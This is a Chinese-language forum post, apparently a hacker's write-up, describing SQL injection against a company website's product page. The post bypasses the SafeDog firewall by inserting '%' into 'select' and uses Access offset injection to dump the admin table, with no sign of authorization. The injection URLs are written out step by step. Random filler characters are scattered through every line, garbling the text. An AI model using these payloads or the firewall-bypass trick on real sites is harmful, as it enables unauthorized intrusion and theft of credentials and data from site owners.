打开网站,一个企业站。2 _& U# Z" C: k* h. [# H: T
0 c3 x* k+ f* n
$ ^* ]4 t5 h f. n; C顺手加个admin0 d5 o" y, S# [/ F1 I% i
$ V8 x* g' _; }6 u3 p5 e5 R& `$ J4 K. L* v1 n# D- l; |& G
默认后台。2 k @4 \2 b# n p" j/ k
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。% h9 w9 N* M F- q4 ~9 O- q$ a o% f
$ g+ D# H& |$ i7 K
3 c: ], o3 y/ F. {6 y4 Z
3 q3 q, w! y: Q& g( d# P0 r
所以就不用御剑扫了,待会直接封IP。$ r3 F0 _3 v/ k
- @* ]9 h0 z! ^* B用order by语句判断是否存在注入。
& [( S! Q4 q1 Z) x" N5 r& I# ihttp://www.xxx.com /product_show.asp?id=997 order by 1- y2 e0 ]( G; j" Z. E& D2 O; @1 E
http://www.xxx.com /product_show.asp?id=997 order by 100
+ b4 E* F( F5 i6 Z$ p现在存在注入,经测试后发现是9个字段。$ j$ h- r: Z1 A, v3 {: N% l+ X
/ j& s. s( G# P% J$ Q
接下来进行联合查询,猜是否存在admin表。6 h6 K2 V( C0 W; j
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。" o5 u# w! x1 ?8 v
( H3 @" m v& ` k1 c
) u- x' s, z' y2 K- ?% h( v# Y7 o# z8 q/ K
在select中间加个%,se%lect绕过安全狗。
9 P' i- c0 u. G* h4 A+ q% H
. I7 ~ V$ ^0 i8 P& R- u6 L3 ~5 B, }4 x7 w3 r3 @
发现存在admin表,然后开始手工猜常用的字段。
& w- j& g0 J2 p4 g纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
- c% s% X n" F 7 m! p3 S' G1 D. l1 A
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。7 o4 \8 L* G9 W* k V3 L7 @ J
% y! H0 _7 F/ z) [; a7 k4 r
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
" v; e, K6 P' s7 W3 h9 Khttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin3 q$ v, t) V }: |: U) A+ I
好了,敏感内容出显了。" c N( c: V, _: ], e% o( i
- R! G/ h/ o" k5 H0 }* Z, d' p6 `- H* ]
/ f6 ^! q$ k+ a |